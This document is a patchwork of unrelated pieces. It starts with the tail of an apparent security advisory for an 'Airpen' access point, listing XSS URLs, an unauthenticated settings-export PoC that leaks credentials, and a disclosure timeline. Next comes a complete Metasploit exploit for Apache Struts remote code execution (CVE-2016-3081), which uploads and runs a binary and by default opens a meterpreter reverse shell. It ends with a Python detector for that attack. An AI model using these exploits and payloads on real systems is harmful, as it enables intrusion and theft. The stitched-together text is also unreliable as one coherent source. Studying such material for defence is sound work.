http://{airpenXweb}/goform/setWan?connectionType=[*XSS*]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]
IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including all stored credentials, via a direct request to
/cgi-bin/ExportSettings.sh.
PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh
V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
In the device description (on the vendor's site) it is very clear that the
priority is to facilitate everything for you, including setup. Therefore it is
not mandatory to configure a password for the web interface, nor for connecting
to the AP; this way you can find hundreds of these completely unprotected APs.
VI. No SSL
``````````````````
Any action, whether sensitive or not, is transmitted in plain text because
HTTPS is not used.
POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
admuser=ORWL_user&admpass=ORWL_pass
Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered,
and so do messages sent through the site's contact forms.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
        Execution can be performed via method: prefix when Dynamic Method Invocation
        is enabled.
      },
      'Author'         => [ 'Nixawk' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2016-3081' ],
          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
        ],
      'Platform'       => %w{ linux },
      'Privileged'     => true,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid'
      },
      'Targets'        =>
        [
          ['Linux Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate' => 'Apr 27 2016',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
        OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
      ], self.class)
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def send_http_request(payload)
    uri = normalize_uri(datastore['TARGETURI'])
    res = send_request_cgi(
      'uri'    => "#{uri}#{payload}",
      'method' => 'POST')
    if res && res.code == 404
      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
    end
    res
  end

  def parameterize(params) # params is a hash
    URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
  end

  def generate_rce_payload(code, params_hash)
    payload = "?method:"
    payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
    payload << ","
    payload << Rex::Text.uri_encode(code)
    payload << ","
    payload << Rex::Text.uri_encode("1?#xx:#request.toString")
    payload << "&"
    payload << parameterize(params_hash)
    payload
  end

  def temp_path
    @TMPPATH ||= lambda {
      path = datastore['TMPPATH']
      return nil unless path
      unless path.end_with?('/')
        path << '/'
      end
      return path
    }.call
  end

  def upload_file(filename, content)
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)
    var_c = rand_text_alpha_lower(4)
    var_d = rand_text_alpha_lower(4)

    code = "##{var_a}=new sun.misc.BASE64Decoder(),"
    code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0]))),"
    code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])),"
    code << "##{var_b}.close()"

    params_hash = { var_c => filename, var_d => content }
    payload = generate_rce_payload(code, params_hash)
    send_http_request(payload)
  end

  def execute_command(cmd)
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)
    var_c = rand_text_alpha_lower(4)
    var_d = rand_text_alpha_lower(4)
    var_e = rand_text_alpha_lower(4)
    var_f = rand_text_alpha_lower(4)

    code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream(),"
    code << "##{var_b}=new java.io.InputStreamReader(##{var_a}),"
    code << "##{var_c}=new java.io.BufferedReader(##{var_b}),"
    code << "##{var_d}=new char[1024],"
    code << "##{var_c}.read(##{var_d}),"
    code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
    code << "##{var_e}.println(##{var_d}),"
    code << "##{var_e}.close()"

    cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
    params_hash = { var_f => cmd }
    payload = generate_rce_payload(code, params_hash)
    send_http_request(payload)
  end

  def linux_stager
    payload_exe = rand_text_alphanumeric(4 + rand(4))
    path = temp_path || '/tmp/'
    payload_exe = "#{path}#{payload_exe}"

    b64_filename = Rex::Text.encode_base64(payload_exe)
    b64_content = Rex::Text.encode_base64(generate_payload_exe)

    print_status("Uploading exploit to #{payload_exe}")
    upload_file(b64_filename, b64_content)

    print_status("Attempting to execute the payload...")
    execute_command("chmod 700 #{payload_exe}")
    execute_command("/bin/sh -c #{payload_exe}")
  end

  def exploit
    linux_stager
  end

  def check
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)

    addend_one = rand_text_numeric(rand(3) + 1).to_i
    addend_two = rand_text_numeric(rand(3) + 1).to_i
    sum = addend_one + addend_two
    flag = Rex::Text.rand_text_alpha(5)

    code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
    code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
    code << "##{var_a}.close()"

    params_hash = { var_b => flag }
    payload = generate_rce_payload(code, params_hash)

    begin
      resp = send_http_request(payload)
    rescue Msf::Exploit::Failed
      return Exploit::CheckCode::Unknown
    end

    if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
end
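Added defender-side example, not part of the module above: a detector that runs over constructed access-log lines and flags a `method:` prefix carrying OGNL expressions of the shape generate_rce_payload builds (CVE-2016-3081), while letting a plain Dynamic Method Invocation call such as method:cancel through. The log format and the marker list are assumptions.

```python
"""Detection of Apache Struts Dynamic Method Invocation abuse (CVE-2016-3081)
in web-server access logs. Added example, independent of the module above;
the log lines are constructed and the marker list is an assumption."""
import re
from urllib.parse import unquote, urlsplit

# Combined/common log format: client, timestamp, "METHOD target HTTP/x", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# OGNL fragments seen in exploitation, never in a legitimate DMI call.
OGNL_MARKERS = ('#_memberaccess', '@ognl.ognlcontext@', '@java.lang.runtime@',
                '@org.apache.struts2.servletactioncontext@', '#parameters.',
                'java.io.fileoutputstream', 'sun.misc.base64decoder')

# Constructed sample: one injection attempt, one benign DMI call, one unrelated hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Apr/2016:10:01:02 +0000] "POST /blank-struts2/login.action'
    '?method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C'
    '%23abcd%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29'
    '.getWriter%28%29%2C%23abcd.print%28%23parameters.wxyz%5B0%5D%29%2C'
    '1%3F%23xx%3A%23request.toString&wxyz=ZSLOK HTTP/1.1" 200 312',
    '10.0.0.8 - - [27/Apr/2016:10:02:10 +0000] "GET /blank-struts2/login.action'
    '?method:cancel HTTP/1.1" 200 1034',
    '10.0.0.9 - - [27/Apr/2016:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]


def classify_target(target):
    """Return None (no DMI), 'dmi' (plain method:name) or 'ognl-injection'."""
    query = unquote(unquote(urlsplit(target).query))  # twice: double-encoded probes
    if not query.startswith('method:'):
        return None
    expr = query[len('method:'):].split('&', 1)[0]
    low = expr.lower()
    # A real method name is a bare identifier; #, @, ( or = means an OGNL expression.
    if any(m in low for m in OGNL_MARKERS) or re.search(r'[#@(=]', expr):
        return 'ognl-injection'
    return 'dmi'


def scan_log(lines):
    """Return (client, timestamp, raw target) for every injection attempt."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and classify_target(m['target']) == 'ognl-injection':
            alerts.append((m['ip'], m['ts'], m['target']))
    return alerts
```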